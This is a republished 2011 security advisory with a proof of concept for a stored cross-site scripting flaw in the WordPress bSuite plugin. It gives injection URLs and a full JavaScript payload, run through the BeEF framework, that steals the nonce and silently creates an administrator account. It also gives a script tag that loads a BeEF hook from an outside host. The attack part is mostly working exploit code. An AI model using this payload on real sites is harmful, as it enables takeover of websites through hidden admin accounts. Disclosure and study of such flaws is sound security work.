WordPress bSuite 4.0.7 Cross Site Scripting

2011.07.21
Credit: IHTeam
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Original advisory: http://www.ihteam.net/advisory/bsuite-wordpress-permanent-xss/ *WordPress bSuite <= 4.0.7 Permanent XSS -> Add Admin* *Download link:* http://wordpress.org/extend/plugins/bsuite/ *Author contact:* 29/06/2011 *POC published:* 11/07/2011 Plugin is out-of-date, last update on 2009, so this is just a POC that show how to made the XSS more useful *FIX:* Add htmlspecialchars to output *Bug found by:* IHTeam *Follow us on Twitter! @IHTeam <http://twitter.com/IHTeam>* *CHECK BSUITE:* http://192.168.1.100/wordpress/plugins/bsuite/js/bsuite.js *PERMANENT XSS POC:* You can inject XSS in different way, for example: http://192.168.1.100/wordpress/?s=<h2>XSSED</h2> or directly in URL: http://192.168.1.100/wordpress/?p=1&<h1>XSSED</h1> Now, when admin enter in bSuite panel, will see the XSSED code <http://www.ihteam.net/wp-content/uploads/bsuite_XSSED.jpeg> *XSS TO REMOTE ADMIN ADD: *We will use beef <http://beefproject.com/>to do that part. So: 1. Run beef on you local machine 2. Enable auto-run that code: jQuery(?<div>?, { id: ?testbeef? }).appendTo(?#screen-meta-links?); jQuery.get(?user-new.php?, function(data) { jQuery(?#testbeef?).html(data); var nonce=jQuery(?#_wpnonce_create-user?).val(); jQuery(?#testbeef?).html(??); jQuery.post(?user-new.php?, { ?_wp_http_referer?: ?/wordpress/wp-admin/user-new.php?, ?_wpnonce_create-user?: nonce, action: ?createuser?, createuser: ?Add New User?, email: ?hax0rmail@mail.com?, first_name: ??, last_name: ??, pass1: ?123123hello?, pass2: ?123123hello?, role: ?administrator?, url: ??, user_login: ?hax0r? }); }); We make 2 request to //wordpress/wp-admin/user-new.php/ because we need to grab /_wpnonce_create-user/ value. 1. First create a new div with ID /testbeef/ 2. Request user-new.php and append content to the DIV 3. Grab _wpnonce_create-user value to nonce variable 4. Clean the DIV content; 5. Make a POST request to user-new.php with the correct values Review the code to change _wp_http_referer, pass1, pass2 and user_login of the POST request. Now it?s time to inject the beef control script in bSuite like this: http://192.168.1.100/s=<script src=?http://192.168.1.102/beef/hook/beefmagic.js.php?></script> You may wait 1h to 5h for bSuit refresh. It will result in new admin with username: /haxor/ and password: /123123hello/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top